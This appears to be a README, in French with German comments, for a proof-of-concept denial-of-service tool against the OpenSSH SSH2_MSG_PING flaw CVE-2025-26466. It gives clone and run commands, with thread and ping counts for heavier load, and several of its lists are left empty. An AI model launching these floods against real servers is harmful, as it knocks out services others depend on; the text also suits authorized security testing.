
CVE-2025-26466 OpenSSH SSH2_MSG_PING DoS PoC
Avertissement : Ce code est exclusivement destiné à des fins pédagogiques et à des tests de sécurité autorisés. Les attaques non autorisées contre des systèmes tiers sont illégales.
CVE-2025-26466 est une vulnérabilité de déni de service (DoS) avant authentification dans OpenSSH, qui permet de surcharger un serveur SSH avant la fin de l'échange de clés.
Le serveur accepte les paquets SSH2_MSG_PING (type de message 192) dès le handshake initial, sans qu'une connexion authentifiée ne soit établie. Cela entraîne :
# Repository klonen
git clone https://github.com/acidboonrs/cve-2025-26466-openssh-poc.git
cd cve-2025-26466-openssh-poc
# Berechtigung für Ausführung (optional)
chmod +x poc.py
Aucune dépendance supplémentaire requise (uniquement la bibliothèque standard).
python3 poc.py 192.168.1.10
python3 poc.py <ziel-host> [port] [threads] [pings]
Paramètres :
<ziel-host> - IP cible ou nom d'hôte (requis)[port] - Port SSH (défaut : 22)[threads] - Nombre de connexions parallèles (défaut : 10)[pings] - PINGs par connexion (défaut : 500)# Standard: localhost, Port 22, 10 Threads, 500 PINGs
python3 poc.py localhost
# Erhöhte Last: 50 Threads, 1000 PINGs
python3 poc.py 192.168.1.10 22 50 1000
# Custom Port
python3 poc.py example.com 2222 20 800
Licence MIT - voir LICENSE pour plus de détails
Ce PoC est publié car :
Utilisez ce code uniquement :
Les attaques DoS non autorisées sont passibles de poursuites !
Auteur : Vollassiliz (voidcall.dev)
Créé : 2025-01-29